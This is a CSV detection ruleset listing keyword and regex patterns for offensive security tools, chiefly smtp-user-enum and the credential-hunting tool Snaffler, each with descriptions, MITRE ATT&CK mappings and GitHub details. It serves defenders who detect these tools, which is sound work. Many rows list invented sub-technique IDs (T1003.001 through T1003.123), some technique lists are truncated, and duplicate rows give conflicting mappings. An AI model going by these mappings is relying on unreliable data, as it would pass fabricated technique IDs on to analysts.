*",".{0,1000}smtp\-user\-enum\s.{0,1000}\s\-M\sVRFY\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*smtp-user-enum*",".{0,1000}smtp\-user\-enum.{0,1000}","offensive_tool_keyword","smtp-user-enum","Username guessing tool primarily for use against the default Solaris SMTP service. Can use either EXPN - VRFY or RCPT TO.","T1133 - T1110.001","TA0007 - TA0006","N/A","N/A","Credential Access","https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*smtp-user-enum.py*",".{0,1000}smtp\-user\-enum\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","1","N/A","8","10","4816","847","2024-01-23T06:15:45Z","2019-03-01T23:50:14Z" "*SnaffCon/Snaffler*",".{0,1000}SnaffCon\/Snaffler.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnaffCore.csproj*",".{0,1000}SnaffCore\.csproj.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible 
boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnaffCore/ActiveDirectory*",".{0,1000}SnaffCore\/ActiveDirectory.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD 
environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnaffCore/Classifiers*",".{0,1000}SnaffCore\/Classifiers.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - 
T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnaffCore/Concurrency*",".{0,1000}SnaffCore\/Concurrency.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - 
T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnaffCore/Config*",".{0,1000}SnaffCore\/Config.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 
- T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnaffCore/ShareFind*",".{0,1000}SnaffCore\/ShareFind.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - 
T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnaffCore/TreeWalk*",".{0,1000}SnaffCore\/TreeWalk.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - 
T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*Snaffler.csproj*",".{0,1000}Snaffler\.csproj.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" 
"*Snaffler.exe*",".{0,1000}Snaffler\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*snaffler.exe*",".{0,1000}snaffler\.exe.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*snaffler.exe*",".{0,1000}snaffler\.exe.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - 
T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*snaffler.log*",".{0,1000}snaffler\.log.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*Snaffler.Properties*",".{0,1000}Snaffler\.Properties.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*Snaffler.sln*",".{0,1000}Snaffler\.sln.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters and red teamers to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1595 - T1592 - T1589 - T1590 - T1591","TA0043","N/A","N/A","Reconnaissance","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*Snaffler.sln*",".{0,1000}Snaffler\.sln.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 
- T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*Snaffler.SnaffRules*",".{0,1000}Snaffler\.SnaffRules.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*SnafflerMessage.cs*",".{0,1000}SnafflerMessage\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - 
T1003.092 - T1003.093 - T1003.094 - T1003.095 - T1003.096 - T1003.097 - T1003.098 - T1003.099 - T1003.100 - T1003.101 - T1003.102 - T1003.103 - T1003.104 - T1003.105 - T1003.106 - T1003.107 - T1003.108 - T1003.109 - T1003.110 - T1003.111 - T1003.112 - T1003.113 - T1003.114 - T1003.115 - T1003.116 - T1003.117 - T1003.118 - T1003.119 - T1003.120 - T1003.121 - T1003.122 - T1003.123 - T1003","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/SnaffCon/Snaffler","1","1","N/A","N/A","10","1824","186","2024-04-15T05:55:16Z","2020-03-30T07:03:47Z" "*SnafflerMessageType.cs*",".{0,1000}SnafflerMessageType\.cs.{0,1000}","offensive_tool_keyword","Snaffler","Snaffler is a tool for pentesters to help find delicious candy needles (creds mostly but it's flexible) in a bunch of horrible boring haystacks (a massive Windows/AD environment)","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008 - T1003.009 - T1003.010 - T1003.011 - T1003.012 - T1003.013 - T1003.014 - T1003.015 - T1003.016 - T1003.017 - T1003.018 - T1003.019 - T1003.020 - T1003.021 - T1003.022 - T1003.023 - T1003.024 - T1003.025 - T1003.026 - T1003.027 - T1003.028 - T1003.029 - T1003.030 - T1003.031 - T1003.032 - T1003.033 - T1003.034 - T1003.035 - T1003.036 - T1003.037 - T1003.038 - T1003.039 - T1003.040 - T1003.041 - T1003.042 - T1003.043 - T1003.044 - T1003.045 - T1003.046 - T1003.047 - T1003.048 - T1003.049 - T1003.050 - T1003.051 - T1003.052 - T1003.053 - T1003.054 - T1003.055 - T1003.056 - T1003.057 - T1003.058 - T1003.059 - T1003.060 - T1003.061 - T1003.062 - T1003.063 - T1003.064 - T1003.065 - T1003.066 - T1003.067 - T1003.068 - T1003.069 - T1003.070 - T1003.071 - T1003.072 - T1003.073 - T1003.074 - T1003.075 - T1003.076 - T1003.077 - T1003.078 - T1003.079 - T1003.080 - T1003.081 - T1003.082 - T1003.083 - T1003.084 - T1003.085 - T1003.086 - T1003.087 - T1003.088 - T1003.089 - T1003.090 - T1003.091 - T1003.092 - T1003.093 - T1003.094 - T1003.095 
